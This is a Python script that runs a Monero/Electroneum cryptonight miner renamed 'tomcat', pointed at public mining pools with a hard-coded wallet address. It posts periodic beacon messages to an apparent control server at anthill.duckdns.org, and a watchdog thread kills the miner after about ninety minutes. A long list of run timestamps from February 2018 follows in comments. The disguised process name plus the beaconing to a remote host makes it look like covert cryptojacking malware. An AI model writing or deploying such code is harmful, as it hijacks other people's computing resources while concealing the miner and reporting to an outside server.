import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:51:03.775176
#2018-02-17 16:37:06.136990
#2018-02-17 18:25:06.941049
#2018-02-17 20:13:04.751799
#2018-02-17 22:01:04.267401
#2018-02-17 23:45:06.609060
#2018-02-18 01:36:05.297265
#2018-02-18 03:23:01.802144
#2018-02-18 05:11:02.074697
#2018-02-18 07:03:05.108055
#2018-02-18 08:51:05.237062
#2018-02-18 10:38:06.148506
#2018-02-18 12:23:06.626599
#2018-02-18 14:11:05.068531
#2018-02-18 16:01:04.186578
#2018-02-18 17:50:06.159488
#2018-02-18 19:36:06.851193
#2018-02-18 21:21:01.277622
#2018-02-18 23:08:06.981976
#2018-02-19 00:55:05.803160
#2018-02-19 02:42:01.964558
#2018-02-19 04:29:04.859305
#2018-02-19 06:15:03.396779
#2018-02-19 08:03:04.015186
#2018-02-19 09:53:01.738585
#2018-02-19 11:42:06.784205
#2018-02-19 13:29:01.445949
#2018-02-19 15:17:08.818490
#2018-02-19 17:05:09.022150
#2018-02-19 18:50:10.329054
#2018-02-19 20:39:07.614006
#2018-02-19 22:26:05.509831
#2018-02-20 00:12:06.021105
#2018-02-20 01:59:06.221916
#2018-02-20 03:49:03.872560
#2018-02-20 05:34:04.925641
#2018-02-20 07:18:05.425943
#2018-02-20 09:05:03.669264
#2018-02-20 10:48:06.956702
#2018-02-20 12:35:01.651940
#2018-02-20 14:20:09.186319
#2018-02-20 16:04:01.329902
#2018-02-20 17:50:13.920757
#2018-02-20 19:41:05.450326
#2018-02-20 21:28:06.389233
#2018-02-20 23:13:06.973857
#2018-02-21 00:58:05.585200
#2018-02-21 02:44:01.818234
#2018-02-21 04:33:07.525830
#2018-02-21 06:22:05.640349
#2018-02-21 08:07:01.916914
#2018-02-21 09:53:01.947777
#2018-02-21 11:41:08.804964
#2018-02-21 13:31:06.060330
#2018-02-21 15:16:10.777482
#2018-02-21 17:07:05.060545
#2018-02-21 18:53:08.059406
#2018-02-21 20:42:07.572130
#2018-02-21 23:29:06.621518
#2018-02-22 01:18:03.985077
#2018-02-22 03:07:05.562346
#2018-02-22 04:52:01.654699
#2018-02-22 06:37:07.711332
#2018-02-22 08:25:05.313515
#2018-02-22 10:11:05.500396
#2018-02-22 11:56:06.415466
#2018-02-22 13:43:04.510323
#2018-02-22 15:29:09.406878
#2018-02-22 17:15:09.026963
#2018-02-22 19:03:05.711484
#2018-02-22 20:54:04.551995
#2018-02-22 22:39:06.020508
#2018-02-23 00:27:07.728915
#2018-02-23 02:15:09.504080
#2018-02-23 04:02:06.216431
#2018-02-23 05:47:06.223793
#2018-02-23 07:37:04.575788
#2018-02-23 09:39:06.811499
#2018-02-23 11:45:13.530685
#2018-02-23 13:35:06.813161
#2018-02-23 15:21:08.739296
#2018-02-23 17:08:08.013703
#2018-02-23 18:35:08.396703
#2018-02-23 20:17:01.590217
#2018-02-23 21:52:06.731134
#2018-02-23 23:32:01.911885
#2018-02-24 00:57:06.700261
#2018-02-24 02:44:06.900738
#2018-02-24 04:22:06.413898
#2018-02-24 05:50:07.670527
#2018-02-24 07:27:03.959341
#2018-02-24 08:59:05.214560
#2018-02-24 10:48:05.569557
#2018-02-24 12:35:08.089095
#2018-02-24 14:24:05.908447
#2018-02-24 16:12:06.622588
#2018-02-24 18:04:06.099177
#2018-02-24 19:51:05.369337
#2018-02-24 21:35:08.583587
#2018-02-25 00:23:06.019133
#2018-02-25 03:29:01.344649
#2018-02-25 06:20:04.219396
#2018-02-25 11:34:05.240841
#2018-02-25 13:11:01.213068
#2018-02-25 14:44:01.882370
#2018-02-25 16:17:01.834231